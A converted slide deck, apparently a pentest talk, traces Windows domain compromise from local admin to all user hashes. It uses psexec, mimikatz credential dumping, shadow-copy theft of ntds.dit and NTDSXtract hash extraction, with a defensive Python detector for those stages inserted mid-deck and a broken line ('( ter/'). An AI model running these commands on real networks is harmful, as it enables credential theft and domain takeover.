Fall of a domain | From local admin to Domain user hashes


Published on February 27, 2014

Author: null0x00



Author: Riyaz Walikar

The Fall of a Domain
Local admin to domain user hashes
Riyaz Walikar

Disclaimer
- It was far more painstaking and complicated than this!
- Demo setup to show the execution path
- All the commands were actually used in the pentest
- Please do not try this on your office/corporate environment without written permission

Please exercise caution!

The story so far
- Remote RDP access to a machine on the client network via VPN
- Local Administrator rights to simulate an employee
- User is a limited domain user
- Domain controller on the same network, reachable, with LDAP services running

Visually. This.

Local Admin eh?
- Locally logged in as TARDIS\fwhite
- Limited domain user but local admin
- Other users connected? [Task Manager > Users]
- Found another user connected to our system via RDP, sweet! (possibly domain admin)
- Need SYSTEM privs! Any ideas?

Think Sysinternals!
- psexec -s -i cmd.exe

Dump connected user credentials
- mimikatz (Benjamin Delpy)
- Extracts plaintext passwords from memory
- Wdigest, tspkg, kerberos and many more
- mimikatz
  privilege::debug
  token::elevate
  sekurlsa::logonPasswords

Windows (In)Security?

Now what?

Remote CMD anyone?
- RDP directly!
- Let's be discreet
- psexec -s -u TARDIS\atomboy cmd.exe
- Game already over!
- Instead RDP with the user's credentials and present the report

Let's grab some hashes
- Active Directory stores user information in %systemroot%\ntds\ntds.dit
- Locked while the system is running
- ntdsutil + snapshot = backup (Windows 2008 and later)
- vssadmin create shadow /for=C: (Windows 2003 and later)

Let's grab some hashes
- Backup readable by NT AUTHORITY\SYSTEM and Administrators
- We need the ntds.dit and SYSTEM files
- cd / dir / other inbuilt cmd commands do not work on unmounted volume shadow copies
- copy works!

Core files needed

NTDS.dit structure parse?
- NTDSXtract: a framework for offline forensic analysis of ntds.dit
- Need the libesedb module as well
- libesedb and creddump in
- wget to a Linux box (Kali is a good choice)

Get framework + compile + make + run
- wget
- wget .zip
- unzip both

Get framework + compile + make + run
- cd ntds_dump_hash/libesedb
- ./configure && make
- cd libesedb/esedbtools
- ./esedbexport -l /tmp/ntds.log <ntds.dit>

Yay!
- python ../../ntdsxtract/ datatable link_table --passwordhashes <system_file> --passwordhistory <system_file>
- Cleanup the output with ( ter/
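The chain the slides walk through leaves distinct traces at each step: a PsExec service install when running as SYSTEM, a process opening LSASS memory when credentials are dumped, a vssadmin or ntdsutil snapshot command, and a copy of ntds.dit out of the shadow copy. As an added defensive example (not part of the original deck, and not the author's or any project's code), the Python below maps constructed JSON-lines telemetry onto those stages and escalates hosts where more than one stage fires. The field names (host, event_id, image, command_line, service_name, source_image, target_image, image_path), the sample events, and the LSASS allowlist are assumptions made for this example rather than a vendor schema.

```python
"""
Added detection example for the stages in the deck: PsExec service as
SYSTEM, LSASS memory access, shadow copy / ntdsutil snapshot, and a copy
of ntds.dit. Field names and sample events are assumptions for the example.
"""
import json
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample telemetry in the style of the Windows System log
# (7045 = service installed) and Sysmon (1 = process create, 10 = process
# access). Hostnames, users and paths are made up for this example.
SAMPLE_EVENTS = r'''
{"host": "WS01", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"}
{"host": "WS01", "event_id": 1, "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe"}
{"host": "WS01", "event_id": 10, "source_image": "C:\\Temp\\mimikatz.exe", "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"}
{"host": "WS01", "event_id": 10, "source_image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1000"}
{"host": "DC01", "event_id": 1, "user": "TARDIS\\atomboy", "image": "C:\\Windows\\System32\\vssadmin.exe", "command_line": "vssadmin create shadow /for=C:"}
{"host": "DC01", "event_id": 1, "user": "TARDIS\\atomboy", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\Temp\\ntds.dit"}
{"host": "DC02", "event_id": 1, "user": "TARDIS\\backupsvc", "image": "C:\\Windows\\System32\\ntdsutil.exe", "command_line": "ntdsutil snapshot \"activate instance ntds\" create quit quit"}
{"host": "WS02", "event_id": 1, "user": "TARDIS\\fwhite", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c dir C:\\Users"}
'''

# Images that legitimately open LSASS (security products, Windows components).
# Illustrative only; tune to the environment being monitored.
LSASS_ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wininit.exe",
}

# Commands the slides use to get at the locked ntds.dit.
SHADOW_COPY_RE = re.compile(r"vssadmin\s+create\s+shadow|ntdsutil.*\bsnapshot\b", re.I)
NTDS_COPY_RE = re.compile(r"\b(copy|xcopy|robocopy)\b.*ntds\.dit", re.I)


@dataclass(frozen=True)
class Alert:
    host: str
    stage: str
    detail: str


def parse_events(text: str) -> List[dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(event: dict) -> List[Alert]:
    """Map one event to zero or more stage alerts."""
    alerts: List[Alert] = []
    host = event.get("host", "?")
    eid = event.get("event_id")
    # Stage 1: PsExec installs its PSEXESVC service when it runs with -s.
    if eid == 7045 and "psexesvc" in (event.get("service_name", "") + event.get("image_path", "")).lower():
        alerts.append(Alert(host, "psexec_service", event["service_name"]))
    # Stage 2: a non-allowlisted process opened a handle to lsass.exe.
    if eid == 10 and event.get("target_image", "").lower().endswith(r"\lsass.exe"):
        src = event.get("source_image", "")
        if src.lower() not in LSASS_ALLOWLIST:
            alerts.append(Alert(host, "lsass_access", src))
    # Stages 3 and 4: snapshot of the volume, then a copy of ntds.dit.
    if eid == 1:
        cmd = event.get("command_line", "")
        if SHADOW_COPY_RE.search(cmd):
            alerts.append(Alert(host, "shadow_copy", cmd))
        if NTDS_COPY_RE.search(cmd):
            alerts.append(Alert(host, "ntds_copy", cmd))
    return alerts


def run(text: str) -> Dict[str, List[str]]:
    """Return, per host, the ordered list of distinct stages observed."""
    stages: Dict[str, List[str]] = defaultdict(list)
    for ev in parse_events(text):
        for a in detect(ev):
            if a.stage not in stages[a.host]:
                stages[a.host].append(a.stage)
    return dict(stages)


def escalate(stages: Dict[str, List[str]]) -> List[str]:
    """Hosts with two or more stages: treat as an incident, not a single hit."""
    return sorted(h for h, s in stages.items() if len(s) >= 2)


if __name__ == "__main__":
    found = run(SAMPLE_EVENTS)
    for host, s in found.items():
        print(host, "->", ", ".join(s))
    print("escalate:", escalate(found))
```

On the sample, WS01 trips the PsExec and LSASS stages and DC01 the snapshot and ntds.dit copy, so both are escalated; DC02 shows a lone ntdsutil snapshot (plausibly a backup job) and stays a single hit for an analyst to triage, and WS02 produces nothing. The allowlist is what keeps the LSASS rule usable: without it every antivirus scan of LSASS would fire, so it needs to be maintained per environment.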

Now what?

Pass the hash / Password Cracking!
- Use the Windows Credentials Editor (Amplia Security)
- Password Cracking >> Humla perhaps

References   ml 

Thank you
